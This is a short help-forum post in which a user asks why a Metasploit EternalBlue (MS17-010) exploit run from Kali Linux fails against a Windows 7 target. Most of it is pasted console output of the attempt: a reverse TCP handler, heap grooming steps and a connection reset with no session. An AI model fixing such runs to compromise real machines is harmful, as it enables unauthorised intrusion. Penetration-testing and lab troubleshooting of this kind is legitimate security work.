Knowledge Base

Ask A Question

Questions

3

Ethernal blue problem

I have this problem with windows/smb/ms17_010_eternalblue I use Linux kali 4.14.0-kali3-amd64 #1 SMP Debian 4.14.12-2kali1 (2018-01-08) x86_64 GNU/Linux [*] Started reverse TCP handler on "Lhost:port" [*] "Rhost IP:port" - Connecting to target for exploitation. [+] "Rhost IP:port" - Connection established for exploitation. [+] "Rhost IP:port" - Target OS selected valid for OS indicated by SMB reply [*] "Rhost IP:port" - CORE raw buffer dump (38 bytes) [*] "Rhost IP:port" - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima [*] "Rhost IP:port" - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service [*] "Rhost IP:port" - 0x00000020 50 61 63 6b 20 31 Pack 1 [+] "Rhost IP:port" - Target arch selected valid for arch indicated by DCE/RPC reply [*] "Rhost IP:port" - Trying exploit with 12 Groom Allocations. [*] "Rhost IP:port" - Sending all but last fragment of exploit packet [*] "Rhost IP:port" - Starting non-paged pool grooming [+] "Rhost IP:port" - Sending SMBv2 buffers [+] "Rhost IP:port" - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] "Rhost IP:port" - Sending final SMBv2 buffers. [*] "Rhost IP:port" - Sending last fragment of exploit packet! [*] "Rhost IP:port" - Receiving response from exploit packet [-] "Rhost IP:port" - Did not receive a response from exploit packet [*] "Rhost IP:port" - Sending egg to corrupted connection. [-] "Rhost IP:port" - Errno::ECONNRESET: Connection reset by peer [*] Exploit completed, but no session was created.

Posted by Jhon Dale 9 months ago